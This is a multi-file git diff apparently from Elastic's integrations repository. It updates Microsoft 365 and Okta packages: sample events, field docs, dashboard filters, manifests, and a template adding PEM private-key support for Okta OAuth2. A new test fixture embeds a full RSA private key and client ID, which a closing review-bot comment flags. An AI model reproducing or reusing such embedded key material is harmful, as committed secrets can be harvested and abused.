@@ -1,11 +1,11 @@ { "@timestamp": "2020-02-07T16:43:53.000Z", "agent": { - "ephemeral_id": "91cd5dfa-317b-4703-978a-b833a6f2b714", - "id": "56df57b5-55fe-47f5-a382-b9a4b1918ce6", + "ephemeral_id": "50dde7f7-f3a3-4597-9ce3-fd6c21fbe6df", + "id": "a6ce2e4c-5271-405f-acc5-cb378534481d", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.12.1" }, "client": { "address": "213.97.47.133", @@ -20,9 +20,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "56df57b5-55fe-47f5-a382-b9a4b1918ce6", + "id": "a6ce2e4c-5271-405f-acc5-cb378534481d", "snapshot": false, - "version": "8.10.1" + "version": "8.12.1" }, "event": { "action": "PageViewed", 
@@ -33,9 +33,9 @@ "code": "SharePoint", "dataset": "o365.audit", "id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", - "ingested": "2023-11-06T19:08:33Z", + "ingested": "2024-04-01T12:10:04Z", "kind": "event", - "original": "{Site=d5180cfc-3479-44d6-b410-8c985ac894e3, ObjectId=https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx, ItemType=Page, UserKey=i:0h.f|membership|1003200096971f55@live.com, OrganizationId=b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd, Operation=PageViewed, ClientIP=213.97.47.133, Workload=OneDrive, EventSource=SharePoint, RecordType=4, Version=1, WebId=8c5c94bb-8396-470c-87d7-8999f440cd30, UserId=asr@testsiem.onmicrosoft.com, CreationTime=2020-02-07T16:43:53, UserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0, CustomUniqueId=true, CorrelationId=622b339f-4000-a000-f25f-92b3478c7a25, Id=99d005e6-a4c6-46fd-117c-08d7abeceab5, UserType=0, ListItemUniqueId=59a8433d-9bb8-cfef-6edc-4c0fc8b86875}", + "original": "{Site=d5180cfc-3479-44d6-b410-8c985ac894e3, ObjectId=https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx, UserKey=i:0h.f|membership|1003200096971f55@live.com, ItemType=Page, OrganizationId=b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd, Operation=PageViewed, ClientIP=213.97.47.133, Workload=OneDrive, EventSource=SharePoint, RecordType=4, Version=1, UserId=asr@testsiem.onmicrosoft.com, WebId=8c5c94bb-8396-470c-87d7-8999f440cd30, CreationTime=2020-02-07T16:43:53, UserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0, CustomUniqueId=true, Id=99d005e6-a4c6-46fd-117c-08d7abeceab5, CorrelationId=622b339f-4000-a000-f25f-92b3478c7a25, ListItemUniqueId=59a8433d-9bb8-cfef-6edc-4c0fc8b86875, UserType=0}", "outcome": "success", "provider": "OneDrive", "type": [ @@ -108,4 +108,4 @@ }, "version": "72.0." } -} +} \ No newline at end of file 
diff --git a/packages/o365/docs/README.md b/packages/o365/docs/README.md index 99225910c4b..af1bc05c8c8 100644 --- a/packages/o365/docs/README.md +++ b/packages/o365/docs/README.md @@ -63,11 +63,11 @@ An example event for `audit` looks as following: { "@timestamp": "2020-02-07T16:43:53.000Z", "agent": { - "ephemeral_id": "91cd5dfa-317b-4703-978a-b833a6f2b714", - "id": "56df57b5-55fe-47f5-a382-b9a4b1918ce6", + "ephemeral_id": "50dde7f7-f3a3-4597-9ce3-fd6c21fbe6df", + "id": "a6ce2e4c-5271-405f-acc5-cb378534481d", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.12.1" }, "client": { "address": "213.97.47.133", @@ -82,9 +82,9 @@ An example event for `audit` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "56df57b5-55fe-47f5-a382-b9a4b1918ce6", + "id": "a6ce2e4c-5271-405f-acc5-cb378534481d", "snapshot": false, - "version": "8.10.1" + "version": "8.12.1" }, "event": { "action": "PageViewed", 
@@ -95,9 +95,9 @@ An example event for `audit` looks as following: "code": "SharePoint", "dataset": "o365.audit", "id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", - "ingested": "2023-11-06T19:08:33Z", + "ingested": "2024-04-01T12:10:04Z", "kind": "event", - "original": "{Site=d5180cfc-3479-44d6-b410-8c985ac894e3, ObjectId=https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx, ItemType=Page, UserKey=i:0h.f|membership|1003200096971f55@live.com, OrganizationId=b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd, Operation=PageViewed, ClientIP=213.97.47.133, Workload=OneDrive, EventSource=SharePoint, RecordType=4, Version=1, WebId=8c5c94bb-8396-470c-87d7-8999f440cd30, UserId=asr@testsiem.onmicrosoft.com, CreationTime=2020-02-07T16:43:53, UserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0, CustomUniqueId=true, CorrelationId=622b339f-4000-a000-f25f-92b3478c7a25, Id=99d005e6-a4c6-46fd-117c-08d7abeceab5, UserType=0, ListItemUniqueId=59a8433d-9bb8-cfef-6edc-4c0fc8b86875}", + "original": "{Site=d5180cfc-3479-44d6-b410-8c985ac894e3, ObjectId=https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx, UserKey=i:0h.f|membership|1003200096971f55@live.com, ItemType=Page, OrganizationId=b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd, Operation=PageViewed, ClientIP=213.97.47.133, Workload=OneDrive, EventSource=SharePoint, RecordType=4, Version=1, UserId=asr@testsiem.onmicrosoft.com, WebId=8c5c94bb-8396-470c-87d7-8999f440cd30, CreationTime=2020-02-07T16:43:53, UserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0, CustomUniqueId=true, Id=99d005e6-a4c6-46fd-117c-08d7abeceab5, CorrelationId=622b339f-4000-a000-f25f-92b3478c7a25, ListItemUniqueId=59a8433d-9bb8-cfef-6edc-4c0fc8b86875, UserType=0}", "outcome": "success", "provider": "OneDrive", "type": [ 
@@ -171,7 +171,6 @@ An example event for `audit` looks as following: "version": "72.0." } } - ``` **Exported fields** @@ -246,6 +245,7 @@ An example event for `audit` looks as following: | log.offset | Offset of the entry in the log file. | long | | message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | | network.type | In the OSI Model this would be the Network Layer. ipv4, ipv6, ipsec, pim, etc The field value must be normalized to lowercase for querying. | keyword | +| o365.audit.Activity | | keyword | | o365.audit.Actor.ID | | keyword | | o365.audit.Actor.Type | | keyword | | o365.audit.ActorContextId | | keyword | @@ -339,6 +339,7 @@ An example event for `audit` looks as following: | o365.audit.EventSource | | keyword | | o365.audit.ExceptionInfo.\* | | object | | o365.audit.ExchangeMetaData.\* | | object | +| o365.audit.Experience | | keyword | | o365.audit.ExtendedProperties.\* | | object | | o365.audit.ExternalAccess | | boolean | | o365.audit.FileSizeBytes | | long | @@ -367,8 +368,12 @@ An example event for `audit` looks as following: | o365.audit.ModifiedProperties.\*.\* | | object | | o365.audit.Name | | keyword | | o365.audit.NewValue | | keyword | +| o365.audit.ObjectDisplayName | | keyword | | o365.audit.ObjectId | | keyword | +| o365.audit.ObjectType | | keyword | | o365.audit.Operation | | keyword | +| o365.audit.OperationId | | keyword | +| o365.audit.OperationProperties | | object | | o365.audit.OrganizationId | | keyword | | o365.audit.OrganizationName | | keyword | | o365.audit.OriginatingServer | | keyword | 
@@ -377,6 +382,7 @@ An example event for `audit` looks as following: | o365.audit.PolicyDetails | | flattened | | o365.audit.PolicyId | | keyword | | o365.audit.RecordType | | keyword | +| o365.audit.RequestId | | keyword | | o365.audit.ResultStatus | | keyword | | o365.audit.SensitiveInfoDetectionIsIncluded | | boolean | | o365.audit.SessionId | | keyword | @@ -397,6 +403,7 @@ An example event for `audit` looks as following: | o365.audit.TargetUserOrGroupType | | keyword | | o365.audit.TeamGuid | | keyword | | o365.audit.TeamName | | keyword | +| o365.audit.Timestamp | | keyword | | o365.audit.UniqueSharingId | | keyword | | o365.audit.UserAgent | | keyword | | o365.audit.UserId | | keyword | @@ -405,6 +412,8 @@ An example event for `audit` looks as following: | o365.audit.Version | | keyword | | o365.audit.WebId | | keyword | | o365.audit.Workload | | keyword | +| o365.audit.WorkspaceId | | keyword | +| o365.audit.WorkspaceName | | keyword | | o365.audit.YammerNetworkId | | keyword | | organization.id | Unique identifier for the organization. | keyword | | organization.name | Organization name. | keyword | diff --git a/packages/o365/kibana/dashboard/o365-712e2c00-685d-11ea-8d6a-292ef5d68366.json b/packages/o365/kibana/dashboard/o365-712e2c00-685d-11ea-8d6a-292ef5d68366.json index 44cda5782bd..982b03ac80b 100644 --- a/packages/o365/kibana/dashboard/o365-712e2c00-685d-11ea-8d6a-292ef5d68366.json +++ b/packages/o365/kibana/dashboard/o365-712e2c00-685d-11ea-8d6a-292ef5d68366.json @@ -21,11 +21,17 @@ { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", "name": "indexpattern-datasource-layer-051e93f9-a0af-4048-8b2b-c0f80afef037", "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1f7c266f-4644-40a7-8d95-093ce57f0bde", + "type": "index-pattern" } ], "state": { 
@@ -59,11 +65,34 @@ "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "1f7c266f-4644-40a7-8d95-093ce57f0bde", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "o365.audit" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "o365.audit" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", - "query": "data_stream.dataset:\"o365.audit\" " + "query": "" }, "visualization": { "layerId": "051e93f9-a0af-4048-8b2b-c0f80afef037", @@ -88,16 +117,22 @@ "panelIndex": "b6942e2a-81dc-40e4-a932-8b7a864b28bc", "title": "Audit Event Count [Logs o365]", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", "name": "indexpattern-datasource-layer-5f7c5274-a250-4841-8da4-02409d1dec5a", "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e660b65c-3095-4031-92b8-6e7d33b77934", + "type": "index-pattern" } ], "state": { @@ -173,11 +208,34 @@ "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "e660b65c-3095-4031-92b8-6e7d33b77934", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "o365.audit" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "o365.audit" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", - "query": "data_stream.dataset:\"o365.audit\" " + "query": "" }, "visualization": { "axisTitlesVisibilitySettings": { 
@@ -262,16 +320,22 @@ }, "panelIndex": "9673e6df-4b1e-4771-b1c6-c41c9bfc7272", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", "name": "indexpattern-datasource-layer-4f66319b-8f8c-4e74-b285-e81462d8508c", "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "86705eef-7a2e-45c2-8ec0-b0cfd99357b0", + "type": "index-pattern" } ], "state": { @@ -332,11 +396,34 @@ "layers": {} } }, - "filters": [], + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "86705eef-7a2e-45c2-8ec0-b0cfd99357b0", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "o365.audit" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "o365.audit" + } + } + } + ], "internalReferences": [], "query": { "language": "kuery", - "query": "data_stream.dataset:\"o365.audit\" " + "query": "" }, "visualization": { "layers": [ @@ -387,11 +474,12 @@ "panelIndex": "70ab7239-c65c-41da-8242-da61750745d7", "title": "Audit Event Type [Logs o365]", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -400,7 +488,12 @@ }, { "id": "logs-*", - "name": "2c47b554-eafa-4209-ad42-afc5b207be0b", + "name": "020d0487-163c-45ed-95ca-5c643e903632", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e48f699a-8e4e-4e8e-957c-aceec5f283a9", "type": "index-pattern" } ], @@ -498,7 +591,7 @@ "alias": null, "disabled": false, "field": "event.category", - "index": "2c47b554-eafa-4209-ad42-afc5b207be0b", + "index": "020d0487-163c-45ed-95ca-5c643e903632", "key": "event.category", "negate": false, "params": { 
@@ -511,6 +604,28 @@ "event.category": "authentication" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "e48f699a-8e4e-4e8e-957c-aceec5f283a9", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "o365.audit" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "o365.audit" + } + } } ], "internalReferences": [], 
@@ -562,16 +677,16 @@ "panelIndex": "9ae12e73-92f2-43a6-b847-2a7b1939709c", "title": "Top users by authentication outcome", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { "description": "", "layerListJSON": "[{\"alpha\":1,\"id\":\"0b910b6c-77c8-4223-892a-1ebf69b0ccb4\",\"label\":null,\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"isAutoSelect\":true,\"type\":\"EMS_TMS\",\"lightModeDefault\":\"road_map\"},\"style\":{},\"type\":\"EMS_VECTOR_TILE\",\"visible\":true},{\"alpha\":0.75,\"id\":\"acc53b7b-3411-406b-9371-6fa62b6b9365\",\"label\":null,\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"applyGlobalQuery\":true,\"geoField\":\"source.geo.location\",\"id\":\"3ba31ffc-7051-44bf-96a0-a684020cd2a3\",\"requestType\":\"point\",\"resolution\":\"FINE\",\"type\":\"ES_GEO_GRID\",\"indexPatternRefName\":\"layer_1_source_index_pattern\"},\"style\":{\"isTimeAware\":true,\"properties\":{\"fillColor\":{\"options\":{\"color\":\"Yellow to Red\",\"colorCategory\":\"palette_0\",\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":true,\"sigma\":3},\"type\":\"ORDINAL\",\"useCustomColorRamp\":false},\"type\":\"DYNAMIC\"},\"icon\":{\"options\":{\"value\":\"airfield\"},\"type\":\"STATIC\"},\"iconOrientation\":{\"options\":{\"orientation\":0},\"type\":\"STATIC\"},\"iconSize\":{\"options\":{\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":true,\"sigma\":3},\"maxSize\":32,\"minSize\":8},\"type\":\"DYNAMIC\"},\"labelBorderColor\":{\"options\":{\"color\":\"#FFFFFF\"},\"type\":\"STATIC\"},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}},\"labelColor\":{\"options\":{\"color\":\"#000000\"},\"type\":\"STATIC\"},\"labelSize\":{\"options\":{\"size\":14},\"type\":\"STATIC\"},\"labelText\":{\"options\":{\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"}},\"type\":\"DYNAMIC\"},\"lineColor\":{\"options\":{\"color\":\"#FFF\"},\"type\":\"STATIC\"}
,\"lineWidth\":{\"options\":{\"size\":0},\"type\":\"STATIC\"},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}}},\"type\":\"VECTOR\"},\"type\":\"GEOJSON_VECTOR\",\"visible\":true}]", - "mapStateJSON": "{\"center\":{\"lat\":30.87292,\"lon\":16.67387},\"filters\":[],\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:\\\"o365.audit\\\" \"},\"refreshConfig\":{\"interval\":0,\"isPaused\":false},\"timeFilters\":{\"from\":\"2020-02-05T03:25:59.045Z\",\"to\":\"2020-02-29T10:59:01.067Z\"},\"zoom\":2.88,\"settings\":{\"autoFitToDataBounds\":false}}", + "mapStateJSON": "{\"adHocDataViews\":[],\"zoom\":1.88,\"center\":{\"lon\":-48.94209,\"lat\":42.68781},\"timeFilters\":{\"from\":\"now-30m\",\"to\":\"now\"},\"refreshConfig\":{\"isPaused\":false,\"interval\":0},\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filters\":[{\"meta\":{\"disabled\":false,\"negate\":false,\"alias\":null,\"index\":\"logs-*\",\"key\":\"data_stream.dataset\",\"field\":\"data_stream.dataset\",\"params\":{\"query\":\"o365.audit\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"o365.audit\"}},\"$state\":{\"store\":\"appState\"}}],\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"customIcons\":[],\"disableInteractive\":false,\"disableTooltipControl\":false,\"hideToolbarOverlay\":false,\"hideLayerControl\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"browserLocation\":{\"zoom\":2},\"keydownScrollZoom\":false,\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"}}", "title": "Client Geo Map [Logs o365 audit]", - "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[]}" + "uiStateJSON": "{\"isLayerTOCOpen\":false,\"openTOCDetails\":[]}" }, "enhancements": {}, "hiddenLayers": 
[], @@ -593,7 +708,7 @@ "panelIndex": "15fe975b-6b8b-4445-872d-e06c041e2c31", "title": "Client geolocation map", "type": "map", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { @@ -610,35 +725,48 @@ "panelRefName": "panel_481f1778-caad-4971-b598-bb61c94bf998", "title": "Data Loss Prevention alerts", "type": "search", - "version": "8.7.1" + "version": "8.10.1" } ], "timeRestore": false, "title": "[Logs o365] Audit Dashboard", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-11T02:43:17.837Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-25T14:33:11.892Z", "id": "o365-712e2c00-685d-11ea-8d6a-292ef5d68366", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", "name": "b6942e2a-81dc-40e4-a932-8b7a864b28bc:indexpattern-datasource-layer-051e93f9-a0af-4048-8b2b-c0f80afef037", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "b6942e2a-81dc-40e4-a932-8b7a864b28bc:1f7c266f-4644-40a7-8d95-093ce57f0bde", + "type": "index-pattern" + }, { "id": "logs-*", "name": "9673e6df-4b1e-4771-b1c6-c41c9bfc7272:indexpattern-datasource-layer-5f7c5274-a250-4841-8da4-02409d1dec5a", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "9673e6df-4b1e-4771-b1c6-c41c9bfc7272:e660b65c-3095-4031-92b8-6e7d33b77934", + "type": "index-pattern" + }, { "id": "logs-*", "name": "70ab7239-c65c-41da-8242-da61750745d7:indexpattern-datasource-layer-4f66319b-8f8c-4e74-b285-e81462d8508c", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "70ab7239-c65c-41da-8242-da61750745d7:86705eef-7a2e-45c2-8ec0-b0cfd99357b0", + "type": "index-pattern" + }, { "id": "logs-*", "name": "9ae12e73-92f2-43a6-b847-2a7b1939709c:indexpattern-datasource-layer-0510317c-e0fb-49b5-b22c-80c0865aa5ff", 
@@ -646,7 +774,12 @@ }, { "id": "logs-*", - "name": "9ae12e73-92f2-43a6-b847-2a7b1939709c:2c47b554-eafa-4209-ad42-afc5b207be0b", + "name": "9ae12e73-92f2-43a6-b847-2a7b1939709c:020d0487-163c-45ed-95ca-5c643e903632", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9ae12e73-92f2-43a6-b847-2a7b1939709c:e48f699a-8e4e-4e8e-957c-aceec5f283a9", "type": "index-pattern" }, { @@ -658,7 +791,13 @@ "id": "o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366", "name": "481f1778-caad-4971-b598-bb61c94bf998:panel_481f1778-caad-4971-b598-bb61c94bf998", "type": "search" + }, + { + "id": "o365-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/o365/kibana/search/o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366.json b/packages/o365/kibana/search/o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366.json index d876845fff0..426453d996d 100644 --- a/packages/o365/kibana/search/o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366.json +++ b/packages/o365/kibana/search/o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366.json @@ -110,12 +110,10 @@ "title": "Data Loss Prevention [Logs o365]", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-11T02:24:40.433Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-25T14:25:10.706Z", "id": "o365-8b8e5a10-6886-11ea-8d6a-292ef5d68366", - "migrationVersion": { - "search": "8.0.0" - }, + "managed": true, "references": [ { "id": "logs-*", @@ -136,7 +134,13 @@ "id": "logs-*", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern" + }, + { + "id": "o365-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "type": "search" + "type": "search", + "typeMigrationVersion": "8.0.0" } \ No newline at end of file 
diff --git a/packages/o365/kibana/tag/o365-security-solution-default.json b/packages/o365/kibana/tag/o365-security-solution-default.json
new file mode 100644
index 00000000000..ad9aed75000
--- /dev/null
+++ b/packages/o365/kibana/tag/o365-security-solution-default.json
@@ -0,0 +1,14 @@
+{
+ "attributes": {
+ "color": "#FEC514",
+ "description": "Tag defined in package-spec",
+ "name": "Security Solution"
+ },
+ "coreMigrationVersion": "8.8.0",
+ "created_at": "2024-01-24T15:38:38.681Z",
+ "id": "o365-security-solution-default",
+ "managed": false,
+ "references": [],
+ "type": "tag",
+ "typeMigrationVersion": "8.0.0"
+}
\ No newline at end of file
diff --git a/packages/o365/manifest.yml b/packages/o365/manifest.yml
index 076a543c347..eef70a8acc9 100644
--- a/packages/o365/manifest.yml
+++ b/packages/o365/manifest.yml
@@ -1,13 +1,13 @@
name: o365
title: Microsoft 365
-version: "2.2.0"
+version: "2.3.2"
description: Collect logs from Microsoft 365 with Elastic Agent.
type: integration
-format_version: "3.0.0"
+format_version: "3.0.2"
categories: [security, productivity_security]
conditions:
kibana:
- version: ^8.7.1
+ version: ^8.12.0
icons:
- src: /img/logo-integrations-microsoft-365.svg
title: Microsoft Office 365
diff --git a/packages/okta/changelog.yml b/packages/okta/changelog.yml
index f8a2fc2f5d0..d7ed764ca83 100644
--- a/packages/okta/changelog.yml
+++ b/packages/okta/changelog.yml
@@ -1,4 +1,14 @@
# newer versions go on top
+- version: "2.9.0"
+ changes:
+ - description: Allow private key to be supplied as a PEM block.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9291
+- version: "2.8.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9128
- version: "2.7.1"
changes:
- description: Changed owners
diff --git a/packages/okta/data_stream/system/_dev/test/system/test-oauth2-pem-config.yml b/packages/okta/data_stream/system/_dev/test/system/test-oauth2-pem-config.yml new file mode 100644 index 00000000000..8093eed1d21 --- /dev/null +++ b/packages/okta/data_stream/system/_dev/test/system/test-oauth2-pem-config.yml 
@@ -0,0 +1,45 @@ +input: httpjson +service: okta-oauth2 +vars: + url: http://{{Hostname}}:{{Port}}/api/v1/logs + interval: 10s + enable_request_tracer: true + okta_domain_url: http://{{Hostname}}:{{Port}} + client_id: 0oaajljpeokFZLyKU5d7 + okta_scopes: + - okta.logs.read + key_pem: | + -----BEGIN PRIVATE KEY----- + MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCOuef3HMRhohVT + 5kSoAJgV+atpDjkwTwkOq+ImnbBlv75GaApG90w8VpjXjhqN/1KJmwfyrKiquiMq + OPu+o/672Dys5rUAaWSbT7wRF1GjLDDZrM0GHRdV4DGxM/LKI8I5yE1Mx3EzV+D5 + ZLmcRc5U4oEoMwtGpr0zRZ7uUr6a28UQwcUsVIPItc1/9rERlo1WTv8dcaj4ECC3 + 2Sc0y/F+9XqwJvLd4Uv6ckzP0Sv4tbDA+7jpD9MneAIUiZ4LVj2cwbBd+YRY6jXx + MkevcCSmSX60clBY1cIFkw1DYHqtdHEwAQcQHLGMoi72xRP2qrdzIPsaTKVYoHVo + WA9vADdHAgMBAAECggEAIlx7jjCsztyYyeQsL05FTzUWoWo9NnYwtgmHnshkCXsK + MiUmJEOxZO1sSqj5l6oakupyFWigCspZYPbrFNCiqVK7+NxqQzkccY/WtT6p9uDS + ufUyPwCN96zMCd952lSVlBe3FH8Hr9a+YQxw60CbFjCZ67WuR0opTsi6JKJjJSDb + TQQZ4qJR97D05I1TgfmO+VO7G/0/dDaNHnnlYz0AnOgZPSyvrU2G5cYye4842EMB + ng81xjHD+xp55JNui/xYkhmYspYhrB2KlEjkKb08OInUjBeaLEAgA1r9yOHsfV/3 + DQzDPRO9iuqx5BfJhdIqUB1aifrye+sbxt9uMBtUgQKBgQDVdfO3GYT+ZycOQG9P + QtdMn6uiSddchVCGFpk331u6M6yafCKjI/MlJDl29B+8R5sVsttwo8/qnV/xd3cn + pY14HpKAsE4l6/Ciagzoj+0NqfPEDhEzbo8CyArcd7pSxt3XxECAfZe2+xivEPHe + gFO60vSFjFtvlLRMDMOmqX3kYQKBgQCrK1DISyQTnD6/axsgh2/ESOmT7n+JRMx/ + YzA7Lxu3zGzUC8/sRDa1C41t054nf5ZXJueYLDSc4kEAPddzISuCLxFiTD2FQ75P + lHWMgsEzQObDm4GPE9cdKOjoAvtAJwbvZcjDa029CDx7aCaDzbNvdmplZ7EUrznR + 55U8Wsm8pwKBgBytxTmzZwfbCgdDJvFKNKzpwuCB9TpL+v6Y6Kr2Clfg+26iAPFU + MiWqUUInGGBuamqm5g6jI5sM28gQWeTsvC4IRXyes1Eq+uCHSQax15J/Y+3SSgNT + 9kjUYYkvWMwoRcPobRYWSZze7XkP2L8hFJ7EGvAaZGqAWxzgliS9HtnhAoGAONZ/ + UqMw7Zoac/Ga5mhSwrj7ZvXxP6Gqzjofj+eKqrOlB5yMhIX6LJATfH6iq7cAMxxm + Fu/G4Ll4oB3o5wACtI3wldV/MDtYfJBtoCTjBqPsfNOsZ9hMvBATlsc2qwzKjsAb + tFhzTevoOYpSD75EcSS/G8Ec2iN9bagatBnpl00CgYBVqAOFZelNfP7dj//lpk8y + EUAw7ABOq0S9wkpFWTXIVPoBQUipm3iAUqGNPmvr/9ShdZC9xeu5AwKram4caMWJ + ExRhcDP1hFM6CdmSkIYEgBKvN9N0O4Lx1ba34gk74Hm65KXxokjJHOC0plO7c7ok + 
LNV/bIgMHOMoxiGrwyjAhg== + -----END PRIVATE KEY----- +policy_template: okta +data_stream: + vars: + preserve_original_event: true +assert: + hit_count: 4 diff --git a/packages/okta/data_stream/system/agent/stream/httpjson.yml.hbs b/packages/okta/data_stream/system/agent/stream/httpjson.yml.hbs index 1804f77b9b0..467ff8b64a9 100644 --- a/packages/okta/data_stream/system/agent/stream/httpjson.yml.hbs +++ b/packages/okta/data_stream/system/agent/stream/httpjson.yml.hbs @@ -33,6 +33,9 @@ auth.oauth2.okta.jwk_json: {{jwk_json}} {{#if jwk_file}} auth.oauth2.okta.jwk_file: {{jwk_file}} {{/if}} +{{#if key_pem}} +auth.oauth2.okta.jwk_pem: {{escape_string key_pem}} +{{/if}} {{/if}} {{/if}} {{/unless}} diff --git a/packages/okta/manifest.yml b/packages/okta/manifest.yml index ae2dbab6f26..ae6f311df26 100644 --- a/packages/okta/manifest.yml +++ b/packages/okta/manifest.yml @@ -1,13 +1,13 @@ name: okta title: Okta -version: "2.7.1" +version: "2.9.0" description: Collect and parse event logs from Okta API with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: [security, iam] conditions: kibana: - version: ^8.10.1 + version: ^8.13.0 icons: - src: /img/okta-logo.svg title: Okta 
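Review bot: The new test fixture commits a complete RSA private key under `key_pem` with nothing marking it as disposable, so secret scanners will flag it and a reader cannot tell whether it is a throwaway key for the mocked `okta-oauth2` service or a real credential. Add a comment above it, e.g. `# Throwaway RSA key generated for the okta-oauth2 test mock only; it is not registered with any real Okta tenant.`, and make sure the key genuinely exists nowhere else; the `client_id` beside it looks like a real Okta application ID format, so the same check applies to it. If the test harness can generate the key at setup time instead, that avoids keeping key material in the repository at all.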
